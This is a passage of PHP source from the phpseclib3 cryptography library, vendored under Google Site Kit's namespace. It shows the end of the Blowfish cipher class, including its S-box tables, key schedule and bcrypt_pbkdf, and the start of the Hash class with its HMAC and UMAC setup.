0x4de81751, 0x3830dc8e, 0x379d5862, 0x9320f991, 0xea7a90c2, 0xfb3e7bce, 0x5121ce64, 0x774fbe32, 0xa8b6e37e, 0xc3293d46, 0x48de5369, 0x6413e680, 0xa2ae0810, 0xdd6db224, 0x69852dfd, 0x9072166, 0xb39a460a, 0x6445c0dd, 0x586cdecf, 0x1c20c8ae, 0x5bbef7dd, 0x1b588d40, 0xccd2017f, 0x6bb4e3bb, 0xdda26a7e, 0x3a59ff45, 0x3e350a44, 0xbcb4cdd5, 0x72eacea8, 0xfa6484bb, 0x8d6612ae, 0xbf3c6f47, 0xd29be463, 0x542f5d9e, 0xaec2771b, 0xf64e6370, 0x740e0d8d, 0xe75b1357, 0xf8721671, 0xaf537d5d, 0x4040cb08, 0x4eb4e2cc, 0x34d2466a, 0x115af84, 0xe1b00428, 0x95983a1d, 0x6b89fb4, 0xce6ea048, 0x6f3f3b82, 0x3520ab82, 0x11a1d4b, 0x277227f8, 0x611560b1, 0xe7933fdc, 0xbb3a792b, 0x344525bd, 0xa08839e1, 0x51ce794b, 0x2f32c9b7, 0xa01fbac9, 0xe01cc87e, 0xbcc7d1f6, 0xcf0111c3, 0xa1e8aac7, 0x1a908749, 0xd44fbd9a, 0xd0dadecb, 0xd50ada38, 0x339c32a, 0xc6913667, 0x8df9317c, 0xe0b12b4f, 0xf79e59b7, 0x43f5bb3a, 0xf2d519ff, 0x27d9459c, 0xbf97222c, 0x15e6fc2a, 0xf91fc71, 0x9b941525, 0xfae59361, 0xceb69ceb, 0xc2a86459, 0x12baa8d1, 0xb6c1075e, 0xe3056a0c, 0x10d25065, 0xcb03a442, 0xe0ec6e0e, 0x1698db3b, 0x4c98a0be, 0x3278e964, 0x9f1f9532, 0xe0d392df, 0xd3a0342b, 0x8971f21e, 0x1b0a7441, 0x4ba3348c, 0xc5be7120, 0xc37632d8, 0xdf359f8d, 0x9b992f2e, 0xe60b6f47, 0xfe3f11d, 0xe54cda54, 0x1edad891, 0xce6279cf, 0xcd3e7e6f, 0x1618b166, 0xfd2c1d05, 0x848fd2c5, 0xf6fb2299, 0xf523f357, 0xa6327623, 0x93a83531, 0x56cccd02, 0xacf08162, 0x5a75ebb5, 0x6e163697, 0x88d273cc, 0xde966292, 0x81b949d0, 0x4c50901b, 0x71c65614, 0xe6c6c7bd, 0x327a140a, 0x45e1d006, 0xc3f27b9a, 0xc9aa53fd, 0x62a80f00, 0xbb25bfe2, 0x35bdd2f6, 0x71126905, 0xb2040222, 0xb6cbcf7c, 0xcd769c2b, 0x53113ec0, 0x1640e3d3, 0x38abbd60, 0x2547adf0, 0xba38209c, 0xf746ce76, 0x77afa1c5, 0x20756060, 0x85cbfe4e, 0x8ae88dd8, 0x7aaaf9b0, 0x4cf9aa7e, 0x1948c25c, 0x2fb8a8c, 0x1c36ae4, 0xd6ebe1f9, 0x90d4f869, 0xa65cdea0, 0x3f09252d, 0xc208e69f, 0xb74e6132, 0xce77e25b, 0x578fdfe3, 0x3ac372e6]; /** * P-Array consists of 18 32-bit subkeys * * @var array */ private static $parray = [0x243f6a88, 0x85a308d3, 0x13198a2e, 0x3707344, 0xa4093822, 0x299f31d0, 0x82efa98, 0xec4e6c89, 0x452821e6, 0x38d01377, 0xbe5466cf, 0x34e90c6c, 0xc0ac29b7, 0xc97c50dd, 0x3f84d5b5, 0xb5470917, 0x9216d5d9, 0x8979fb1b]; /** * The BCTX-working Array * * Holds the expanded key [p] and the key-depended s-boxes [sb] * * @var array */ private $bctx; /** * Holds the last used key * * @var array */ private $kl; /** * The Key Length (in bytes) * {@internal The max value is 256 / 8 = 32, the min value is 128 / 8 = 16. Exists in conjunction with $Nk * because the encryption / decryption / key schedule creation requires this number and not $key_length. We could * derive this from $key_length or vice versa, but that'd mean we'd have to do multiple shift operations, so in lieu * of that, we'll just precompute it once.} * * @see \phpseclib3\Crypt\Common\SymmetricKey::setKeyLength() * @var int */ protected $key_length = 16; /** * Default Constructor. * * @param string $mode * @throws \InvalidArgumentException if an invalid / unsupported mode is provided */ public function __construct($mode) { parent::__construct($mode); if ($this->mode == self::MODE_STREAM) { throw new \InvalidArgumentException('Block ciphers cannot be ran in stream mode'); } } /** * Sets the key length. * * Key lengths can be between 32 and 448 bits. * * @param int $length */ public function setKeyLength($length) { if ($length < 32 || $length > 448) { throw new \LengthException('Key size of ' . $length . ' bits is not supported by this algorithm. Only keys of sizes between 32 and 448 bits are supported'); } $this->key_length = $length >> 3; parent::setKeyLength($length); } /** * Test for engine validity * * This is mainly just a wrapper to set things up for \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * * @see \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * @param int $engine * @return bool */ protected function isValidEngineHelper($engine) { if ($engine == self::ENGINE_OPENSSL) { if ($this->key_length < 16) { return \false; } // quoting https://www.openssl.org/news/openssl-3.0-notes.html, OpenSSL 3.0.1 // "Moved all variations of the EVP ciphers CAST5, BF, IDEA, SEED, RC2, RC4, RC5, and DES to the legacy provider" // in theory openssl_get_cipher_methods() should catch this but, on GitHub Actions, at least, it does not if (\defined('OPENSSL_VERSION_TEXT') && \version_compare(\preg_replace('#OpenSSL (\\d+\\.\\d+\\.\\d+) .*#', '$1', \OPENSSL_VERSION_TEXT), '3.0.1', '>=')) { return \false; } $this->cipher_name_openssl_ecb = 'bf-ecb'; $this->cipher_name_openssl = 'bf-' . $this->openssl_translate_mode(); } return parent::isValidEngineHelper($engine); } /** * Setup the key (expansion) * * @see \phpseclib3\Crypt\Common\SymmetricKey::_setupKey() */ protected function setupKey() { if (isset($this->kl['key']) && $this->key === $this->kl['key']) { // already expanded return; } $this->kl = ['key' => $this->key]; /* key-expanding p[] and S-Box building sb[] */ $this->bctx = ['p' => [], 'sb' => self::$sbox]; // unpack binary string in unsigned chars $key = \array_values(\unpack('C*', $this->key)); $keyl = \count($key); // with bcrypt $keyl will always be 16 (because the key is the sha512 of the key you provide) for ($j = 0, $i = 0; $i < 18; ++$i) { // xor P1 with the first 32-bits of the key, xor P2 with the second 32-bits ... for ($data = 0, $k = 0; $k < 4; ++$k) { $data = $data << 8 | $key[$j]; if (++$j >= $keyl) { $j = 0; } } $this->bctx['p'][] = self::$parray[$i] ^ \intval($data); } // encrypt the zero-string, replace P1 and P2 with the encrypted data, // encrypt P3 and P4 with the new P1 and P2, do it with all P-array and subkeys $data = "\x00\x00\x00\x00\x00\x00\x00\x00"; for ($i = 0; $i < 18; $i += 2) { list($l, $r) = \array_values(\unpack('N*', $data = $this->encryptBlock($data))); $this->bctx['p'][$i] = $l; $this->bctx['p'][$i + 1] = $r; } for ($i = 0; $i < 0x400; $i += 0x100) { for ($j = 0; $j < 256; $j += 2) { list($l, $r) = \array_values(\unpack('N*', $data = $this->encryptBlock($data))); $this->bctx['sb'][$i | $j] = $l; $this->bctx['sb'][$i | $j + 1] = $r; } } } /** * Initialize Static Variables */ protected static function initialize_static_variables() { if (\is_float(self::$sbox[0x200])) { self::$sbox = \array_map('intval', self::$sbox); self::$parray = \array_map('intval', self::$parray); } parent::initialize_static_variables(); } /** * bcrypt * * @param string $sha2pass * @param string $sha2salt * @access private * @return string */ private static function bcrypt_hash($sha2pass, $sha2salt) { $p = self::$parray; $sbox = self::$sbox; $cdata = \array_values(\unpack('N*', 'OxychromaticBlowfishSwatDynamite')); $sha2pass = \array_values(\unpack('N*', $sha2pass)); $sha2salt = \array_values(\unpack('N*', $sha2salt)); self::expandstate($sha2salt, $sha2pass, $sbox, $p); for ($i = 0; $i < 64; $i++) { self::expand0state($sha2salt, $sbox, $p); self::expand0state($sha2pass, $sbox, $p); } for ($i = 0; $i < 64; $i++) { for ($j = 0; $j < 8; $j += 2) { // count($cdata) == 8 list($cdata[$j], $cdata[$j + 1]) = self::encryptBlockHelperFast($cdata[$j], $cdata[$j + 1], $sbox, $p); } } return \pack('V*', ...$cdata); } /** * Performs OpenSSH-style bcrypt * * @param string $pass * @param string $salt * @param int $keylen * @param int $rounds * @access public * @return string */ public static function bcrypt_pbkdf($pass, $salt, $keylen, $rounds) { self::initialize_static_variables(); if (\PHP_INT_SIZE == 4) { throw new \RuntimeException('bcrypt is far too slow to be practical on 32-bit versions of PHP'); } $sha2pass = \hash('sha512', $pass, \true); $results = []; $count = 1; while (32 * \count($results) < $keylen) { $countsalt = $salt . \pack('N', $count++); $sha2salt = \hash('sha512', $countsalt, \true); $out = $tmpout = self::bcrypt_hash($sha2pass, $sha2salt); for ($i = 1; $i < $rounds; $i++) { $sha2salt = \hash('sha512', $tmpout, \true); $tmpout = self::bcrypt_hash($sha2pass, $sha2salt); $out ^= $tmpout; } $results[] = $out; } $output = ''; for ($i = 0; $i < 32; $i++) { foreach ($results as $result) { $output .= $result[$i]; } } return \substr($output, 0, $keylen); } /** * Key expansion without salt * * @access private * @param int[] $key * @param int[] $sbox * @param int[] $p * @see self::_bcrypt_hash() */ private static function expand0state(array $key, array &$sbox, array &$p) { // expand0state is basically the same thing as this: //return self::expandstate(array_fill(0, 16, 0), $key); // but this separate function eliminates a bunch of XORs and array lookups $p = [$p[0] ^ $key[0], $p[1] ^ $key[1], $p[2] ^ $key[2], $p[3] ^ $key[3], $p[4] ^ $key[4], $p[5] ^ $key[5], $p[6] ^ $key[6], $p[7] ^ $key[7], $p[8] ^ $key[8], $p[9] ^ $key[9], $p[10] ^ $key[10], $p[11] ^ $key[11], $p[12] ^ $key[12], $p[13] ^ $key[13], $p[14] ^ $key[14], $p[15] ^ $key[15], $p[16] ^ $key[0], $p[17] ^ $key[1]]; // @codingStandardsIgnoreStart list($p[0], $p[1]) = self::encryptBlockHelperFast(0, 0, $sbox, $p); list($p[2], $p[3]) = self::encryptBlockHelperFast($p[0], $p[1], $sbox, $p); list($p[4], $p[5]) = self::encryptBlockHelperFast($p[2], $p[3], $sbox, $p); list($p[6], $p[7]) = self::encryptBlockHelperFast($p[4], $p[5], $sbox, $p); list($p[8], $p[9]) = self::encryptBlockHelperFast($p[6], $p[7], $sbox, $p); list($p[10], $p[11]) = self::encryptBlockHelperFast($p[8], $p[9], $sbox, $p); list($p[12], $p[13]) = self::encryptBlockHelperFast($p[10], $p[11], $sbox, $p); list($p[14], $p[15]) = self::encryptBlockHelperFast($p[12], $p[13], $sbox, $p); list($p[16], $p[17]) = self::encryptBlockHelperFast($p[14], $p[15], $sbox, $p); // @codingStandardsIgnoreEnd list($sbox[0], $sbox[1]) = self::encryptBlockHelperFast($p[16], $p[17], $sbox, $p); for ($i = 2; $i < 1024; $i += 2) { list($sbox[$i], $sbox[$i + 1]) = self::encryptBlockHelperFast($sbox[$i - 2], $sbox[$i - 1], $sbox, $p); } } /** * Key expansion with salt * * @access private * @param int[] $data * @param int[] $key * @param int[] $sbox * @param int[] $p * @see self::_bcrypt_hash() */ private static function expandstate(array $data, array $key, array &$sbox, array &$p) { $p = [$p[0] ^ $key[0], $p[1] ^ $key[1], $p[2] ^ $key[2], $p[3] ^ $key[3], $p[4] ^ $key[4], $p[5] ^ $key[5], $p[6] ^ $key[6], $p[7] ^ $key[7], $p[8] ^ $key[8], $p[9] ^ $key[9], $p[10] ^ $key[10], $p[11] ^ $key[11], $p[12] ^ $key[12], $p[13] ^ $key[13], $p[14] ^ $key[14], $p[15] ^ $key[15], $p[16] ^ $key[0], $p[17] ^ $key[1]]; // @codingStandardsIgnoreStart list($p[0], $p[1]) = self::encryptBlockHelperFast($data[0], $data[1], $sbox, $p); list($p[2], $p[3]) = self::encryptBlockHelperFast($data[2] ^ $p[0], $data[3] ^ $p[1], $sbox, $p); list($p[4], $p[5]) = self::encryptBlockHelperFast($data[4] ^ $p[2], $data[5] ^ $p[3], $sbox, $p); list($p[6], $p[7]) = self::encryptBlockHelperFast($data[6] ^ $p[4], $data[7] ^ $p[5], $sbox, $p); list($p[8], $p[9]) = self::encryptBlockHelperFast($data[8] ^ $p[6], $data[9] ^ $p[7], $sbox, $p); list($p[10], $p[11]) = self::encryptBlockHelperFast($data[10] ^ $p[8], $data[11] ^ $p[9], $sbox, $p); list($p[12], $p[13]) = self::encryptBlockHelperFast($data[12] ^ $p[10], $data[13] ^ $p[11], $sbox, $p); list($p[14], $p[15]) = self::encryptBlockHelperFast($data[14] ^ $p[12], $data[15] ^ $p[13], $sbox, $p); list($p[16], $p[17]) = self::encryptBlockHelperFast($data[0] ^ $p[14], $data[1] ^ $p[15], $sbox, $p); // @codingStandardsIgnoreEnd list($sbox[0], $sbox[1]) = self::encryptBlockHelperFast($data[2] ^ $p[16], $data[3] ^ $p[17], $sbox, $p); for ($i = 2, $j = 4; $i < 1024; $i += 2, $j = ($j + 2) % 16) { // instead of 16 maybe count($data) would be better? list($sbox[$i], $sbox[$i + 1]) = self::encryptBlockHelperFast($data[$j] ^ $sbox[$i - 2], $data[$j + 1] ^ $sbox[$i - 1], $sbox, $p); } } /** * Encrypts a block * * @param string $in * @return string */ protected function encryptBlock($in) { $p = $this->bctx['p']; // extract($this->bctx['sb'], EXTR_PREFIX_ALL, 'sb'); // slower $sb = $this->bctx['sb']; $in = \unpack('N*', $in); $l = $in[1]; $r = $in[2]; list($r, $l) = \PHP_INT_SIZE == 4 ? self::encryptBlockHelperSlow($l, $r, $sb, $p) : self::encryptBlockHelperFast($l, $r, $sb, $p); return \pack("N*", $r, $l); } /** * Fast helper function for block encryption * * @access private * @param int $x0 * @param int $x1 * @param int[] $sbox * @param int[] $p * @return int[] */ private static function encryptBlockHelperFast($x0, $x1, array $sbox, array $p) { $x0 ^= $p[0]; $x1 ^= ($sbox[($x0 & 0xff000000) >> 24] + $sbox[0x100 | ($x0 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff] ^ $p[1]; $x0 ^= ($sbox[($x1 & 0xff000000) >> 24] + $sbox[0x100 | ($x1 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff] ^ $p[2]; $x1 ^= ($sbox[($x0 & 0xff000000) >> 24] + $sbox[0x100 | ($x0 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff] ^ $p[3]; $x0 ^= ($sbox[($x1 & 0xff000000) >> 24] + $sbox[0x100 | ($x1 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff] ^ $p[4]; $x1 ^= ($sbox[($x0 & 0xff000000) >> 24] + $sbox[0x100 | ($x0 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff] ^ $p[5]; $x0 ^= ($sbox[($x1 & 0xff000000) >> 24] + $sbox[0x100 | ($x1 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff] ^ $p[6]; $x1 ^= ($sbox[($x0 & 0xff000000) >> 24] + $sbox[0x100 | ($x0 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff] ^ $p[7]; $x0 ^= ($sbox[($x1 & 0xff000000) >> 24] + $sbox[0x100 | ($x1 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff] ^ $p[8]; $x1 ^= ($sbox[($x0 & 0xff000000) >> 24] + $sbox[0x100 | ($x0 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff] ^ $p[9]; $x0 ^= ($sbox[($x1 & 0xff000000) >> 24] + $sbox[0x100 | ($x1 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff] ^ $p[10]; $x1 ^= ($sbox[($x0 & 0xff000000) >> 24] + $sbox[0x100 | ($x0 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff] ^ $p[11]; $x0 ^= ($sbox[($x1 & 0xff000000) >> 24] + $sbox[0x100 | ($x1 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff] ^ $p[12]; $x1 ^= ($sbox[($x0 & 0xff000000) >> 24] + $sbox[0x100 | ($x0 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff] ^ $p[13]; $x0 ^= ($sbox[($x1 & 0xff000000) >> 24] + $sbox[0x100 | ($x1 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff] ^ $p[14]; $x1 ^= ($sbox[($x0 & 0xff000000) >> 24] + $sbox[0x100 | ($x0 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff] ^ $p[15]; $x0 ^= ($sbox[($x1 & 0xff000000) >> 24] + $sbox[0x100 | ($x1 & 0xff0000) >> 16] ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff] ^ $p[16]; return [$x1 & 0xffffffff ^ $p[17], $x0 & 0xffffffff]; } /** * Slow helper function for block encryption * * @access private * @param int $x0 * @param int $x1 * @param int[] $sbox * @param int[] $p * @return int[] */ private static function encryptBlockHelperSlow($x0, $x1, array $sbox, array $p) { // -16777216 == intval(0xFF000000) on 32-bit PHP installs $x0 ^= $p[0]; $x1 ^= self::safe_intval((self::safe_intval($sbox[($x0 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x0 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff]) ^ $p[1]; $x0 ^= self::safe_intval((self::safe_intval($sbox[($x1 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x1 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff]) ^ $p[2]; $x1 ^= self::safe_intval((self::safe_intval($sbox[($x0 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x0 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff]) ^ $p[3]; $x0 ^= self::safe_intval((self::safe_intval($sbox[($x1 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x1 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff]) ^ $p[4]; $x1 ^= self::safe_intval((self::safe_intval($sbox[($x0 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x0 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff]) ^ $p[5]; $x0 ^= self::safe_intval((self::safe_intval($sbox[($x1 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x1 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff]) ^ $p[6]; $x1 ^= self::safe_intval((self::safe_intval($sbox[($x0 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x0 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff]) ^ $p[7]; $x0 ^= self::safe_intval((self::safe_intval($sbox[($x1 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x1 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff]) ^ $p[8]; $x1 ^= self::safe_intval((self::safe_intval($sbox[($x0 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x0 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff]) ^ $p[9]; $x0 ^= self::safe_intval((self::safe_intval($sbox[($x1 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x1 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff]) ^ $p[10]; $x1 ^= self::safe_intval((self::safe_intval($sbox[($x0 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x0 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff]) ^ $p[11]; $x0 ^= self::safe_intval((self::safe_intval($sbox[($x1 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x1 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff]) ^ $p[12]; $x1 ^= self::safe_intval((self::safe_intval($sbox[($x0 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x0 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff]) ^ $p[13]; $x0 ^= self::safe_intval((self::safe_intval($sbox[($x1 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x1 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff]) ^ $p[14]; $x1 ^= self::safe_intval((self::safe_intval($sbox[($x0 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x0 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x0 & 0xff00) >> 8]) + $sbox[0x300 | $x0 & 0xff]) ^ $p[15]; $x0 ^= self::safe_intval((self::safe_intval($sbox[($x1 & -16777216) >> 24 & 0xff] + $sbox[0x100 | ($x1 & 0xff0000) >> 16]) ^ $sbox[0x200 | ($x1 & 0xff00) >> 8]) + $sbox[0x300 | $x1 & 0xff]) ^ $p[16]; return [$x1 ^ $p[17], $x0]; } /** * Decrypts a block * * @param string $in * @return string */ protected function decryptBlock($in) { $p = $this->bctx['p']; $sb = $this->bctx['sb']; $in = \unpack('N*', $in); $l = $in[1]; $r = $in[2]; for ($i = 17; $i > 2; $i -= 2) { $l ^= $p[$i]; $r ^= self::safe_intval((self::safe_intval($sb[$l >> 24 & 0xff] + $sb[0x100 + ($l >> 16 & 0xff)]) ^ $sb[0x200 + ($l >> 8 & 0xff)]) + $sb[0x300 + ($l & 0xff)]); $r ^= $p[$i - 1]; $l ^= self::safe_intval((self::safe_intval($sb[$r >> 24 & 0xff] + $sb[0x100 + ($r >> 16 & 0xff)]) ^ $sb[0x200 + ($r >> 8 & 0xff)]) + $sb[0x300 + ($r & 0xff)]); } return \pack('N*', $r ^ $p[0], $l ^ $p[1]); } /** * Setup the performance-optimized function for de/encrypt() * * @see \phpseclib3\Crypt\Common\SymmetricKey::_setupInlineCrypt() */ protected function setupInlineCrypt() { $p = $this->bctx['p']; $init_crypt = ' static $sb; if (!$sb) { $sb = $this->bctx["sb"]; } '; $safeint = self::safe_intval_inline(); // Generating encrypt code: $encrypt_block = ' $in = unpack("N*", $in); $l = $in[1]; $r = $in[2]; '; for ($i = 0; $i < 16; $i += 2) { $encrypt_block .= ' $l^= ' . $p[$i] . '; $r^= ' . \sprintf($safeint, '(' . \sprintf($safeint, '$sb[$l >> 24 & 0xff] + $sb[0x100 + ($l >> 16 & 0xff)]') . ' ^ $sb[0x200 + ($l >> 8 & 0xff)]) + $sb[0x300 + ($l & 0xff)]') . '; $r^= ' . $p[$i + 1] . '; $l^= ' . \sprintf($safeint, '(' . \sprintf($safeint, '$sb[$r >> 24 & 0xff] + $sb[0x100 + ($r >> 16 & 0xff)]') . ' ^ $sb[0x200 + ($r >> 8 & 0xff)]) + $sb[0x300 + ($r & 0xff)]') . '; '; } $encrypt_block .= ' $in = pack("N*", $r ^ ' . $p[17] . ', $l ^ ' . $p[16] . ' ); '; // Generating decrypt code: $decrypt_block = ' $in = unpack("N*", $in); $l = $in[1]; $r = $in[2]; '; for ($i = 17; $i > 2; $i -= 2) { $decrypt_block .= ' $l^= ' . $p[$i] . '; $r^= ' . \sprintf($safeint, '(' . \sprintf($safeint, '$sb[$l >> 24 & 0xff] + $sb[0x100 + ($l >> 16 & 0xff)]') . ' ^ $sb[0x200 + ($l >> 8 & 0xff)]) + $sb[0x300 + ($l & 0xff)]') . '; $r^= ' . $p[$i - 1] . '; $l^= ' . \sprintf($safeint, '(' . \sprintf($safeint, '$sb[$r >> 24 & 0xff] + $sb[0x100 + ($r >> 16 & 0xff)]') . ' ^ $sb[0x200 + ($r >> 8 & 0xff)]) + $sb[0x300 + ($r & 0xff)]') . '; '; } $decrypt_block .= ' $in = pack("N*", $r ^ ' . $p[0] . ', $l ^ ' . $p[1] . ' ); '; $this->inline_crypt = $this->createInlineCryptFunction(['init_crypt' => $init_crypt, 'init_encrypt' => '', 'init_decrypt' => '', 'encrypt_block' => $encrypt_block, 'decrypt_block' => $decrypt_block]); } } <?php /** * Wrapper around hash() and hash_hmac() functions supporting truncated hashes * such as sha256-96. Any hash algorithm returned by hash_algos() (and * truncated versions thereof) are supported. * * If {@link self::setKey() setKey()} is called, {@link self::hash() hash()} will * return the HMAC as opposed to the hash. * * Here's a short example of how to use this library: * <code> * <?php * include 'vendor/autoload.php'; * * $hash = new \phpseclib3\Crypt\Hash('sha512'); * * $hash->setKey('abcdefg'); * * echo base64_encode($hash->hash('abcdefg')); * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @author Andreas Fischer <bantu@phpbb.com> * @copyright 2015 Andreas Fischer * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; use Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField; /** * @author Jim Wigginton <terrafrost@php.net> * @author Andreas Fischer <bantu@phpbb.com> */ class Hash { /** * Padding Types * */ const PADDING_KECCAK = 1; /** * Padding Types * */ const PADDING_SHA3 = 2; /** * Padding Types * */ const PADDING_SHAKE = 3; /** * Padding Type * * Only used by SHA3 * * @var int */ private $paddingType = 0; /** * Hash Parameter * * @see self::setHash() * @var int */ private $hashParam; /** * Byte-length of hash output (Internal HMAC) * * @see self::setHash() * @var int */ private $length; /** * Hash Algorithm * * @see self::setHash() * @var string */ private $algo; /** * Key * * @see self::setKey() * @var string */ private $key = \false; /** * Nonce * * @see self::setNonce() * @var string */ private $nonce = \false; /** * Hash Parameters * * @var array */ private $parameters = []; /** * Computed Key * * @see self::_computeKey() * @var string */ private $computedKey = \false; /** * Outer XOR (Internal HMAC) * * Used only for sha512 * * @see self::hash() * @var string */ private $opad; /** * Inner XOR (Internal HMAC) * * Used only for sha512 * * @see self::hash() * @var string */ private $ipad; /** * Recompute AES Key * * Used only for umac * * @see self::hash() * @var boolean */ private $recomputeAESKey; /** * umac cipher object * * @see self::hash() * @var AES */ private $c; /** * umac pad * * @see self::hash() * @var string */ private $pad; /** * Block Size * * @var int */ private $blockSize; /**#@+ * UMAC variables * * @var PrimeField */ private static $factory36; private static $factory64; private static $factory128; private static $offset64; private static $offset128; private static $marker64; private static $marker128; private static $maxwordrange64; private static $maxwordrange128; /**#@-*/ /** * Default Constructor. * * @param string $hash */ public function __construct($hash = 'sha256') { $this->setHash($hash); } /** * Sets the key for HMACs * * Keys can be of any length. * * @param string $key */ public function setKey($key = \false) { $this->key = $key; $this->computeKey(); $this->recomputeAESKey = \true; } /** * Sets the nonce for UMACs * * Keys can be of any length. * * @param string $nonce */ public function setNonce($nonce = \false) { switch (\true) { case !\is_string($nonce): case \strlen($nonce) > 0 && \strlen($nonce) <= 16: $this->recomputeAESKey = \true; $this->nonce = $nonce; return; } throw new \LengthException('The nonce length must be between 1 and 16 bytes, inclusive'); } /** * Pre-compute the key used by the HMAC * * Quoting http://tools.ietf.org/html/rfc2104#section-2, "Applications that use keys longer than B bytes * will first hash the key using H and then use the resultant L byte string as the actual key to HMAC." * * As documented in https://www.reddit.com/r/PHP/comments/9nct2l/symfonypolyfill_hash_pbkdf2_correct_fix_for/ * when doing an HMAC multiple times it's faster to compute the hash once instead of computing it during * every call * */ private function computeKey() { if ($this->key === \false) { $this->computedKey = \false; return; } if (\strlen($this->key) <= $this->getBlockLengthInBytes()) { $this->computedKey = $this->key; return; } $this->computedKey = \is_array($this->algo) ? \call_user_func($this->algo, $this->key) : \hash($this->algo, $this->key, \true); } /** * Gets the hash function. * * As set by the constructor or by the setHash() method. * * @return string */ public function getHash() { return $this->hashParam; } /** * Sets the hash function. * * @param string $hash */ public function setHash($hash) { $oldHash = $this->hashParam; $this->hashParam = $hash = \strtolower($hash); switch ($hash) { case 'umac-32': case 'umac-64': case 'umac-96': case 'umac-128': if ($oldHash != $this->hashParam) { $this->recomputeAESKey = \true; } $this->blockSize = 128; $this->length = \abs(\substr($hash, -3)) >> 3; $this->algo = 'umac'; return; case 'md2-96': case 'md5-96': case 'sha1-96': case 'sha224-96': case 'sha256-96': case 'sha384-96': case 'sha512-96': case 'sha512/224-96': case 'sha512/256-96': $hash = \substr($hash, 0, -3); $this->length = 12; // 96 / 8 = 12 break; case 'md2': case 'md5': $this->length = 16; 